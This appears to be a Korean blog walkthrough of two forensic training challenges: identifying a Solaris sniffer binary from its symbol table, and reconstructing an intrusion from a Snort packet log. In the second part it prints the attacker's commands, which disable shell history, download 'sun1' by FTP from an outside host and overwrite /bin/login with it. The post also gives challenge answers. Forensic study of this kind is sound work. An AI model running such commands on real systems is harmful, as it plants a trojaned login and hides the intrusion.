Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Congratz! You made a success of challenge!
=====================================================
Question 21 - 악성 프로그램 분석
=====================================================
# /usr/ccs/bin/nm /dev/a.out
/dev/a.out:
[Index] Value Size Type Bind Other Shndx Name
[29] | 0| 0|SECT |LOCL |0 |28 |
[28] | 0| 0|SECT |LOCL |0 |27 |
[27] | 0| 0|SECT |LOCL |0 |26 |
[26] | 0| 0|SECT |LOCL |0 |25 |
[25] | 0| 0|SECT |LOCL |0 |24 |
[24] | 0| 0|SECT |LOCL |0 |23 |
[23] | 147264| 0|SECT |LOCL |0 |22 |
[21] | 147252| 0|SECT |LOCL |0 |20 |
[20] | 147248| 0|SECT |LOCL |0 |19 |
[19] | 147240| 0|SECT |LOCL |0 |18 |
[17] | 147188| 0|SECT |LOCL |0 |16 |
[16] | 146996| 0|SECT |LOCL |0 |15 |
[15] | 146536| 0|SECT |LOCL |0 |14 |
[18] | 147232| 0|SECT |LOCL |0 |17 |
[22] | 147256| 0|SECT |LOCL |0 |21 |
[2] | 65748| 0|SECT |LOCL |0 |1 |
[3] | 65768| 0|SECT |LOCL |0 |2 |
[4] | 66492| 0|SECT |LOCL |0 |3 |
[6] | 68664| 0|SECT |LOCL |0 |5 |
[7] | 68728| 0|SECT |LOCL |0 |6 |
[5] | 67932| 0|SECT |LOCL |0 |4 |
[8] | 68764| 0|SECT |LOCL |0 |7 |
[9] | 68800| 0|SECT |LOCL |0 |8 |
[10] | 69208| 0|SECT |LOCL |0 |9 |
[11] | 79236| 0|SECT |LOCL |0 |10 |
[12] | 79264| 0|SECT |LOCL |0 |11 |
[13] | 79288| 0|SECT |LOCL |0 |12 |
[14] | 146496| 0|SECT |LOCL |0 |13 |
[134] | 147224| 4|OBJT |GLOB |0 |16 |CLroot
[117] | 70908| 1520|FUNC |GLOB |0 |9 |END_NODE
[81] | 70700| 208|FUNC |GLOB |0 |9 |GET_NODE
[113] | 148260| 4|OBJT |GLOB |0 |22 |LOG
[130] | 147220| 4|OBJT |GLOB |0 |16 |LastTIME
[99] | 148256| 4|OBJT |GLOB |0 |22 |LogName
[75] | 70656| 44|FUNC |GLOB |0 |9 |NOWtm
[109] | 148272| 16512|OBJT |GLOB |0 |22 |Packet
[96] | 69672| 40|FUNC |GLOB |0 |9 |Pexit
[147] | 148264| 4|OBJT |GLOB |0 |22 |ProgName
[77] | 70592| 64|FUNC |GLOB |0 |9 |Ptm
[146] | 70348| 244|FUNC |GLOB |0 |9 |SERVp
[65] | 69760| 116|FUNC |GLOB |0 |9 |Symaddr
[101] | 69876| 472|FUNC |GLOB |0 |9 |TCPflags
[149] | 69712| 48|FUNC |GLOB |0 |9 |Zexit
[104] | 146996| 0|OBJT |GLOB |0 |15 |_DYNAMIC
[31] | 295856| 0|OBJT |LOCL |0 |22 |_END_
[102] | 146496| 0|OBJT |GLOB |0 |13 |_GLOBAL_OFFSET_
[82] | 0| 0|NOTY |WEAK |0 |UNDEF |_Jv_RegisterCla
[126] | 146536| 0|OBJT |GLOB |0 |14 |_PROCEDURE_LINK
[30] | 65536| 0|OBJT |LOCL |0 |1 |_START_
[56] | 147236| 0|OBJT |LOCL |0 |17 |__CTOR_END__
[39] | 147232| 0|OBJT |LOCL |0 |17 |__CTOR_LIST__
[53] | 147244| 0|OBJT |LOCL |0 |18 |__DTOR_END__
[40] | 147240| 0|OBJT |LOCL |0 |18 |__DTOR_LIST__
[41] | 147248| 0|OBJT |LOCL |0 |19 |__EH_FRAME_BEGI
[59] | 147248| 0|OBJT |LOCL |0 |19 |__FRAME_END__
[58] | 147252| 0|OBJT |LOCL |0 |20 |__JCR_END__
[46] | 147252| 0|OBJT |LOCL |0 |20 |__JCR_LIST__
[140] | 147408| 521|OBJT |GLOB |0 |22 |__ctype
[98] | 0| 0|NOTY |WEAK |0 |UNDEF |__deregister_fr
[54] | 79140| 0|FUNC |LOCL |0 |9 |__do_global_cto
[35] | 69332| 0|FUNC |LOCL |0 |9 |__do_global_dto
[62] | 147192| 0|OBJT |GLOB |0 |16 |__dso_handle
[94] | 147936| 320|OBJT |GLOB |0 |22 |__iob
[85] | 0| 0|NOTY |WEAK |0 |UNDEF |__register_fram
[64] | 147408| 521|OBJT |WEAK |0 |22 |_ctype
[66] | 147260| 0|OBJT |GLOB |0 |21 |_edata
[108] | 295856| 0|OBJT |GLOB |0 |22 |_end
[86] | 147400| 4|OBJT |GLOB |0 |22 |_environ
[132] | 80960| 0|OBJT |GLOB |0 |12 |_etext
[128] | 146608| 0|FUNC |GLOB |0 |UNDEF |_exit
[97] | 79264| 20|FUNC |GLOB |0 |11 |_fini
[74] | 79236| 28|FUNC |GLOB |0 |10 |_init
[80] | 147936| 320|OBJT |WEAK |0 |22 |_iob
[129] | 79288| 4|OBJT |GLOB |0 |12 |_lib_version
[84] | 69208| 116|FUNC |GLOB |0 |9 |_start
[1] | 0| 0|FILE |LOCL |0 |ABS |a.out
[63] | 146836| 0|FUNC |GLOB |0 |UNDEF |alarm
[91] | 146584| 0|FUNC |GLOB |0 |UNDEF |atexit
[148] | 146968| 0|FUNC |GLOB |0 |UNDEF |atoi
[48] | 147304| 10|OBJT |LOCL |0 |22 |buf.1
[125] | 147208| 4|OBJT |GLOB |0 |16 |bufmod
[55] | 79220| 0|FUNC |LOCL |0 |9 |call___do_globa
x
[37] | 69508| 0|FUNC |LOCL |0 |9 |call___do_globa
x
[42] | 69656| 0|FUNC |LOCL |0 |9 |call_frame_dumm
[95] | 74264| 212|FUNC |GLOB |0 |9 |clear_victim
[44] | 147264| 1|OBJT |LOCL |0 |22 |completed.1
[32] | 0| 0|FILE |LOCL |0 |ABS |crti.s
[60] | 0| 0|FILE |LOCL |0 |ABS |crtn.s
[52] | 0| 0|FILE |LOCL |0 |ABS |crtstuff.c
[34] | 0| 0|FILE |LOCL |0 |ABS |crtstuff.c
[116] | 146920| 0|FUNC |GLOB |0 |UNDEF |crypt
[143] | 146716| 0|FUNC |GLOB |0 |UNDEF |ctime
[107] | 164784| 131072|OBJT |GLOB |0 |22 |databuf
[89] | 147196| 4|OBJT |GLOB |0 |16 |debug
[78] | 148268| 4|OBJT |GLOB |0 |22 |device
[103] | 75284| 120|FUNC |GLOB |0 |9 |dlattachreq
[122] | 75780| 172|FUNC |GLOB |0 |9 |dlbindack
[88] | 75612| 168|FUNC |GLOB |0 |9 |dlbindreq
[137] | 75404| 208|FUNC |GLOB |0 |9 |dlokack
[61] | 75952| 120|FUNC |GLOB |0 |9 |dlpromisconreq
[136] | 76108| 1272|FUNC |GLOB |0 |9 |do_it
[110] | 147400| 4|OBJT |WEAK |0 |22 |environ
[87] | 74476| 100|FUNC |GLOB |0 |9 |err
[50] | 147320| 80|OBJT |LOCL |0 |22 |errmsg.2
[115] | 146596| 0|FUNC |GLOB |0 |UNDEF |exit
[145] | 75064| 80|FUNC |GLOB |0 |9 |expecting
[139] | 146812| 0|FUNC |GLOB |0 |UNDEF |fclose
[83] | 146764| 0|FUNC |GLOB |0 |UNDEF |fflush
[68] | 72428| 1836|FUNC |GLOB |0 |9 |filter
[112] | 147212| 4|OBJT |GLOB |0 |16 |filter_flags
[121] | 146956| 0|FUNC |GLOB |0 |UNDEF |fopen
[38] | 147188| 0|OBJT |LOCL |0 |16 |force_to_data
[57] | 147228| 0|OBJT |LOCL |0 |16 |force_to_data
[118] | 146668| 0|FUNC |GLOB |0 |UNDEF |fprintf
[120] | 146752| 0|FUNC |GLOB |0 |UNDEF |fputc
[36] | 69524| 0|FUNC |LOCL |0 |9 |frame_dummy
[106] | 146776| 0|FUNC |GLOB |0 |UNDEF |free
[76] | 77380| 144|FUNC |GLOB |0 |9 |getauth
[133] | 146680| 0|FUNC |GLOB |0 |UNDEF |gethostbyaddr
[131] | 146848| 0|FUNC |GLOB |0 |UNDEF |getmsg
[142] | 146908| 0|FUNC |GLOB |0 |UNDEF |getpass
[114] | 146980| 0|FUNC |GLOB |0 |UNDEF |getpid
[127] | 147200| 4|OBJT |GLOB |0 |16 |if_fd
[72] | 146692| 0|FUNC |GLOB |0 |UNDEF |inet_ntoa
[49] | 147296| 8|OBJT |LOCL |0 |22 |iobuf.0
[69] | 146860| 0|FUNC |GLOB |0 |UNDEF |ioctl
[111] | 77524| 1608|FUNC |GLOB |0 |9 |main
[70] | 146800| 0|FUNC |GLOB |0 |UNDEF |malloc
[79] | 147216| 4|OBJT |GLOB |0 |16 |maxbuflen
[71] | 146788| 0|FUNC |GLOB |0 |UNDEF |memcpy
[43] | 147268| 24|OBJT |LOCL |0 |22 |object.2
[67] | 146884| 0|FUNC |GLOB |0 |UNDEF |open
[45] | 147256| 0|OBJT |LOCL |0 |21 |p.0
[90] | 146656| 0|FUNC |GLOB |0 |UNDEF |perror
[135] | 147204| 4|OBJT |GLOB |0 |16 |promisc
[92] | 146872| 0|FUNC |GLOB |0 |UNDEF |putmsg
[51] | 74576| 32|FUNC |LOCL |0 |9 |sigalrm
[119] | 146824| 0|FUNC |GLOB |0 |UNDEF |signal
[47] | 0| 0|FILE |LOCL |0 |ABS |solsniff.c
[123] | 146704| 0|FUNC |GLOB |0 |UNDEF |sprintf
[100] | 146932| 0|FUNC |GLOB |0 |UNDEF |strcmp
[73] | 146896| 0|FUNC |GLOB |0 |UNDEF |strcpy
[105] | 74608| 456|FUNC |GLOB |0 |9 |strgetmsg
[141] | 75144| 140|FUNC |GLOB |0 |9 |strioctl
[138] | 146728| 0|FUNC |GLOB |0 |UNDEF |strlen
[144] | 76072| 36|FUNC |GLOB |0 |9 |syserr
[93] | 146740| 0|FUNC |GLOB |0 |UNDEF |time
[124] | 146944| 0|FUNC |GLOB |0 |UNDEF |toupper
[33] | 0| 0|FILE |LOCL |0 |ABS |values-Xa.c
#
# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Question > a.out의 용도는 무엇입니까?
Answer > sniffer
Congratz! You made a success of challenge!
=====================================================
Question 22 - 네트워크 패킷 분석
=====================================================
$ cd /home1/user001
$ ls -al
total 192
drwxr-xr-x 2 user001 training 1536 Apr 22 14:13 .
drwxr-xr-x 108 root root 2048 Apr 17 17:49 ..
-rw-r--r-- 1 user001 training 185 Apr 22 14:13 .profile
-rw-r--r-- 1 root other 178544 Apr 22 14:13
0108@000-snort.log-rw-r--r-- 1 user001 training 124 Apr 22 14:13 local.cshrc
-rw-r--r-- 1 user001 training 607 Apr 22 14:13 local.login
-rw-r--r-- 1 user001 training 582 Apr 22 14:13 local.profile
$ /usr/local/bin/tcpflow -r 0108@000-snort.log
$ ls -al
total 314
drwxr-xr-x 2 user001 training 1536 Apr 22 14:13 .
drwxr-xr-x 108 root root 2048 Apr 17 17:49 ..
-rw-r--r-- 1 user001 training 185 Apr 22 14:13 .profile
-rw-r--r-- 1 root other 178544 Apr 22 14:13 0108@000-snort.log
-rw-r--r-- 1 user001 training 89776 Apr 22 14:13 064.224.118.115.00020-17
2.016.001.102.33514
-rw-r--r-- 1 user001 training 590 Apr 22 14:13 064.224.118.115.00021-17
2.016.001.102.33511
-rw-r--r-- 1 user001 training 58 Apr 22 14:13 066.156.236.056.04065-17
2.016.001.102.00023
-rw-r--r-- 1 user001 training 70 Apr 22 14:13 172.016.001.102.00021-19
5.174.097.101.01876
-rw-r--r-- 1 user001 training 73 Apr 22 14:13 172.016.001.102.00023-06
6.156.236.056.04065
-rw-r--r-- 1 user001 training 449 Apr 22 14:13 172.016.001.102.01524-20
8.061.001.160.03596
-rw-r--r-- 1 user001 training 67 Apr 22 14:13 172.016.001.102.06112-20
8.061.001.160.03590
-rw-r--r-- 1 user001 training 80 Apr 22 14:13 172.016.001.102.33511-06
4.224.118.115.00021
-rw-r--r-- 1 user001 training 72 Apr 22 14:13 172.016.001.105.00021-19
5.174.097.101.01879
-rw-r--r-- 1 user001 training 70 Apr 22 14:13 172.016.001.108.00021-19
5.174.097.101.01884
-rw-r--r-- 1 user001 training 16 Apr 22 14:13 195.174.097.101.01876-17
2.016.001.102.00021
-rw-r--r-- 1 user001 training 16 Apr 22 14:13 195.174.097.101.01879-17
2.016.001.105.00021
-rw-r--r-- 1 user001 training 16 Apr 22 14:13 195.174.097.101.01884-17
2.016.001.108.00021
-rw-r--r-- 1 user001 training 53 Apr 22 14:13 208.061.001.160.03590-17
2.016.001.102.06112
-rw-r--r-- 1 user001 training 4178 Apr 22 14:13 208.061.001.160.03592-17
2.016.001.102.06112
-rw-r--r-- 1 user001 training 4178 Apr 22 14:13 208.061.001.160.03593-17
2.016.001.102.06112
-rw-r--r-- 1 user001 training 4178 Apr 22 14:13 208.061.001.160.03594-17
2.016.001.102.06112
-rw-r--r-- 1 user001 training 4178 Apr 22 14:13 208.061.001.160.03595-17
2.016.001.102.06112
-rw-r--r-- 1 user001 training 370 Apr 22 14:13 208.061.001.160.03596-17
2.016.001.102.01524
-rw-r--r-- 1 user001 training 124 Apr 22 14:13 local.cshrc
-rw-r--r-- 1 user001 training 607 Apr 22 14:13 local.login
-rw-r--r-- 1 user001 training 582 Apr 22 14:13 local.profile
$
1524포트의 이름이 들어간 파일을 찾아보면,
$ ls *1524* -al
-rw-r--r-- 1 user001 training 449 Apr 22 14:13 172.016.001.102.01524-20
8.061.001.160.03596
-rw-r--r-- 1 user001 training 370 Apr 22 14:13 208.061.001.160.03596-17
2.016.001.102.01524
$
$ cat 172.016.001.102.01524-208.061.001.160.03596
# SunOS buzzy 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10
/core: No such file or directory
/var/dt/tmp/DTSPCD.log: No such file or directory
BD PID(s): 3476
# 8:47am up 11:24, 0 users, load average: 0.12, 0.04, 0.02
User tty login@ idle JCPU PCPU what
# # # mkdir: Failed to make directory "/usr/lib"; File exists
# # ftp: ioctl(TIOCGETP): Invalid argument
Password:
Name (64.224.118.115:root): # # ps_data
sun1
# # # $
# # # $ cat 208.061.001.160.03596-172.016.001.102.01524
uname -a;ls -l /core /var/dt/tmp/DTSPCD.log;PATH=/usr/local/bin:/usr/bin:/bin:/u
sr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;export PATH;echo "BD PID(s): "`ps -fed|g
rep ' -s /tmp/x'|grep -v grep|awk '{print $2}'`
w
unset HISTFILE
cd /tmp
mkdir /usr/lib
mv /bin/login /usr/lib/libfl.k
ftp 64.224.118.115
ftp
a@
cd pub
binary
get sun1
bye
ls
chmod 555 sun1
mv sun1 /bin/login
$
내용을 보면, ftp를 이용해 64.224.118.115로 접속해서 sun1이라는 파일을 받은 후,
해당 파일을 /bin/login에 덮어쓰는 것을 볼 수 있습니다.
즉 ftp 포트 (20) 번으로 넘어 온 파일이 sun1파일 즉 악성 파일일 것입니다.
$ ls *64.224.118.115*20* -al
-rw-r--r-- 1 user001 training 89776 Apr 22 14:13 064.224.118.115.00020-17
2.016.001.102.33514
$ cp 064.224.118.115.00020-172.016.001.102.33514 evidence
$ finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Question > 공격자가 다운로드한 파일 이름은?
Answer > s 1
Question > 공격자가 변조한 파일 이름은?
Answer > l n
Congratz! You made a success of challenge!
(
0)
(
0)
Posted by Dual
wordlist.txt
test.PDF
